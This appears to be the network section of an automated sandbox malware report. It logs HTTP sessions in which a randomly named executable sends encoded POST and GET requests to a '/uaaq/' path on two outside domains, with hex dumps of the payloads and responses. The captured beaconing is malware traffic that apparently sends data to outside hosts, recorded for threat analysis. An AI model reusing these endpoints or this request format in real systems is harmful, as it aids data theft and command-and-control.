                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.11.304983991.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:53.935081959 CET715OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 6a 31 71 6e 30 46 68 71 34 6f 30 57 64 66 4b 50 4d 53 49 75 4e 42 64 72 6c 41 34 41 66 37 59 4a 49 48 4d 64 36 6d 53 48 56 77 70 4e 36 7a 48 53 6e 46 50 33 58 64 2f 71 68 66 44 6d 77 67 61 6b 4b 6e 58 74 6b 6a 4d 4d 46 44 61 66 66 58 58 6a 55 52 38 43 53 78 4f 39 77 39 6d 4e 31 73 4e 54 6d 32 67 48 64 59 5a 42 66 51 69 43 51 71 65 74 37 2f 45 42 31 4c 43 66 32 42 33 6b 55 58 6c 43 64 4e 55 66 57 77 79 71 65 30 73 4d 54 53 2b 49 7a 63 35 55 6e 50 56 47 44 35 56 2f 5a 53 31 41 42 6d 77 43 63 36 4c 6a 6a 46 50 30 6d 69 6b 2f 52 64 59 71 62 78 75 2b 34 38 3d
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4Af7YJIHMd6mSHVwpN6zHSnFP3Xd/qhfDmwgakKnXtkjMMFDaffXXjUR8CSxO9w9mN1sNTm2gHdYZBfQiCQqet7/EB1LCf2B3kUXlCdNUfWwyqe0sMTS+Izc5UnPVGD5V/ZS1ABmwCc6LjjFP0mik/RdYqbxu+48=
                                                                                    Dec 4, 2023 12:09:54.118352890 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:54 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.11.304984091.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:56.637703896 CET1632OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 6a 31 71 6e 30 46 68 71 34 6f 30 57 64 66 4b 50 4d 53 49 75 4e 42 64 72 6c 41 34 41 66 6a 59 49 36 6a 4d 63 64 61 53 41 56 77 70 41 61 7a 43 53 6e 46 53 33 58 56 37 71 68 44 54 6d 79 6f 61 6c 73 62 58 72 57 4c 4d 44 46 44 61 51 2f 58 55 73 30 52 4d 43 53 67 46 39 77 74 6d 4e 31 73 4e 54 6a 36 67 52 38 59 5a 53 76 51 6a 53 67 71 73 38 4c 2f 6f 42 78 6e 38 66 32 45 43 6b 6c 72 6c 43 39 39 55 64 6b 6f 79 70 2b 30 75 4c 54 53 63 49 7a 59 36 55 6d 69 6b 47 41 6b 2b 2f 61 43 31 45 56 58 61 61 39 61 71 32 69 56 57 38 32 4b 44 34 6b 64 48 32 4a 41 6b 2f 76 65 62 4a 6f 77 65 37 38 4b 34 47 4f 77 30 31 77 7a 72 54 70 68 33 68 2f 76 52 6e 46 42 31 45 65 50 4b 65 67 52 53 57 6b 48 56 69 63 68 64 4b 78 41 4b 47 5a 65 63 51 43 7a 55 6f 6b 30 48 50 33 39 38 48 2b 4f 36 65 63 75 38 36 6b 34 65 4d 55 54 69 2f 37 69 59 57 62 43 62 64 36 4e 7a 4b 35 42 69 7a 41 64 48 38 33 5a 4d 49 76 57 59 63 6f 77 61 6e 38 64 67 42 63 58 4b 49 4c 53 56 34 2f 45 4b 73 58 6b 66 4c 39 77 7a 43 32 35 44 61 56 32 37 52 4f 62 4d 79 63 69 54 65 34 53 34 54 65 57 79 48 42 79 36 74 4d 39 52 70 4a 63 71 55 70 4b 57 5a 47 34 77 33 4b 65 66 70 48 38 45 4b 7a 55 75 4c 2b 30 57 64 6f 69 51 31 69 57 6a 46 70 65 67 49 72 67 36 68 38 72 71 5a 75 68 6e 49 4d 53 53 46 45 55 50 44 50 4d 64 6e 59 32 6a 77 64 33 71 6a 57 48 63 37 42 75 6e 6f 62 70 72 55 4b 50 6a 64 67 67 6f 4c 67 2f 71 62 50 69 78 56 48 61 33 72 53 43 59 64 73 45 36 75 43 6f 54 4c 43 52 30 6c 54 52 50 46 65 55 64 62 63 68 31 73 79 62 4f 4f 4c 62 2b 32 5a 74 33 4a 71 71 2f 51 73 78 5a 49 7a 61 49 4a 4e 74 31 6f 65 50 57 4f 42 77 43 66 35 73 5a 43 70 71 6c 47 75 49 38 46 32 55 64 64 34 54 4f 64 6d 6e 55 65 55 35 52 45 47 54 36 42 63 67 62 4c 4f 61 51 30 46 73 53 58 67 41 30 58 64 35 47 64 50 35 52 64 79 46 50 37 49 62 54 63 65 31 64 57 7a 6c 67 2b 46 4d 72 4d 4c 4a 70 43 52 6e 4a 4f 58 6c 66 31 57 46 50 78 4f 4d 68 67 36 45 48 51 62 44 31 73 36 76 53 75 50 75 2f 7a 63 74 61 37 62 70 74 73 5a 64 4e 4f 68 61 6a 73 6c 32 4e 32 52 6c 31 6b 63 35 73 33 54 34 56 64 56 70 76 4d 65 4a 6c 37 43 75 65 41 38 7a 44 4b 65 73 53 71 39 49 6f 79 2f 55 7a 47 72 33 44 59 36 7a 4e 49 56 56 55 61 4f 48 38 6a 4b 6b 61 72 42 70 41 49 69 39 73 2f 6d 48 35 56 72 48 62 43 2b 45 6a 4e 43 69 38 56 34 6d 69 7a 76 49 47 34 63 7a 33 4e 64 4d 38 42 45 36 6d 35 7a 36 4f 50 66 30 58 4e 35 43 4e 7a 36 78 6b 7a 65 69 71 6c 6e 51 69 6f 64 6b 35 63 4b 37 67 62 6f 49 51 45 61 6b 48 51 61 77 58 6b 54 68 46 4a 2b 45 63 4b 41 2f 51 75 61 43 6c 77 74 52 4f 69 52 67 49 65 78 39 78 74 49 37 4d 58 48 4e 59 44 57 33 73 76 61 4a 4d 64 2f 78 44 69 78 33 68 37 66 6d 47 2f 68 56 49 6c 6f 44 4d 45 77 72 4f 44 51 59 39 68 6c 61 63 33 43 33 46 69 66 32 72 43 31 51 52 79 45 64 70 56 39 69 51 30 43 71 55 65 55 73 48 6a 32 51 59 71 44 75 61 73 38 53 42 52 75 41 48 31 62 70 70 79 31 31 50 4c 34 59 33 69 47 38 62 35 79 69 71 4a 4d 6b 54 78 36 4b 42 46 42 2b 69 51 4e 4b 2b 55 66 70 52 48 44 77 4f 78 66 74 67 52 43 53 4b 2f 42 4c 59 51 6a 61 46 55 59 32 45 4c 47 46 2f 70 32 59 34 6b 48 37 38 49 2b 6a 69 2b 73 35 4e 42 51 5a 50 51 41 54 48 50 42 64 2f 74 7a 6e 42 6b 4b 6e 66 78 74 76 6c 62 70 78 32 42 4c 34 53 58 42 6b 4e 6f 44 31 59 46 39 58 2f 7a 78 78 51 67 4a 5a 38 48 4f 55 74 50 4d 4a 73 75 78 41 6d 4c 30 69 53 46 4d 43 2b 55 7a 41 54 64 77 57 64 58 4f 2f 55 59 62 30 45 57 6c 5a 55 43 55 48 54
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4AfjYI6jMcdaSAVwpAazCSnFS3XV7qhDTmyoalsbXrWLMDFDaQ/XUs0RMCSgF9wtmN1sNTj6gR8YZSvQjSgqs8L/oBxn8f2ECklrlC99Udkoyp+0uLTScIzY6UmikGAk+/aC1EVXaa9aq2iVW82KD4kdH2JAk/vebJowe78K4GOw01wzrTph3h/vRnFB1EePKegRSWkHVichdKxAKGZecQCzUok0HP398H+O6ecu86k4eMUTi/7iYWbCbd6NzK5BizAdH83ZMIvWYcowan8dgBcXKILSV4/EKsXkfL9wzC25DaV27RObMyciTe4S4TeWyHBy6tM9RpJcqUpKWZG4w3KefpH8EKzUuL+0WdoiQ1iWjFpegIrg6h8rqZuhnIMSSFEUPDPMdnY2jwd3qjWHc7BunobprUKPjdggoLg/qbPixVHa3rSCYdsE6uCoTLCR0lTRPFeUdbch1sybOOLb+2Zt3Jqq/QsxZIzaIJNt1oePWOBwCf5sZCpqlGuI8F2Udd4TOdmnUeU5REGT6BcgbLOaQ0FsSXgA0Xd5GdP5RdyFP7IbTce1dWzlg+FMrMLJpCRnJOXlf1WFPxOMhg6EHQbD1s6vSuPu/zcta7bptsZdNOhajsl2N2Rl1kc5s3T4VdVpvMeJl7CueA8zDKesSq9Ioy/UzGr3DY6zNIVVUaOH8jKkarBpAIi9s/mH5VrHbC+EjNCi8V4mizvIG4cz3NdM8BE6m5z6OPf0XN5CNz6xkzeiqlnQiodk5cK7gboIQEakHQawXkThFJ+EcKA/QuaClwtROiRgIex9xtI7MXHNYDW3svaJMd/xDix3h7fmG/hVIloDMEwrODQY9hlac3C3Fif2rC1QRyEdpV9iQ0CqUeUsHj2QYqDuas8SBRuAH1bppy11PL4Y3iG8b5yiqJMkTx6KBFB+iQNK+UfpRHDwOxftgRCSK/BLYQjaFUY2ELGF/p2Y4kH78I+ji+s5NBQZPQATHPBd/tznBkKnfxtvlbpx2BL4SXBkNoD1YF9X/zxxQgJZ8HOUtPMJsuxAmL0iSFMC+UzATdwWdXO/UYb0EWlZUCUHT
                                                                                    Dec 4, 2023 12:09:56.821301937 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:56 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.11.304984191.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:59.340418100 CET425OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:59.522941113 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:09:59 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.11.304984265.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:04.727556944 CET713OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 42 4a 49 78 6e 58 73 59 66 42 4f 55 73 74 56 76 5a 66 53 74 56 36 4e 53 48 57 52 70 47 74 6a 73 53 70 70 5a 38 6d 48 4c 51 67 7a 65 58 77 55 37 64 36 35 58 43 4e 78 69 4f 68 59 6c 33 56 65 75 67 67 4a 61 78 49 44 65 35 50 30 64 4c 4c 72 57 30 30 59 71 74 6e 52 6c 79 47 6f 71 47 56 51 52 59 48 65 33 75 46 53 78 56 34 43 43 70 68 33 2b 73 72 44 78 6b 35 2b 63 34 4b 47 42 78 5a 47 2b 45 43 5a 4d 54 55 6c 6b 4f 4d 65 64 4b 35 6b 74 67 69 77 48 59 48 6b 2f 7a 58 38 71 4a 7a 74 72 62 71 4d 35 54 51 3d 3d
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgBJIxnXsYfBOUstVvZfStV6NSHWRpGtjsSppZ8mHLQgzeXwU7d65XCNxiOhYl3VeuggJaxIDe5P0dLLrW00YqtnRlyGoqGVQRYHe3uFSxV4CCph3+srDxk5+c4KGBxZG+ECZMTUlkOMedK5ktgiwHYHk/zX8qJztrbqM5TQ==
                                                                                    Dec 4, 2023 12:10:05.668194056 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:04 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:10:05.668289900 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
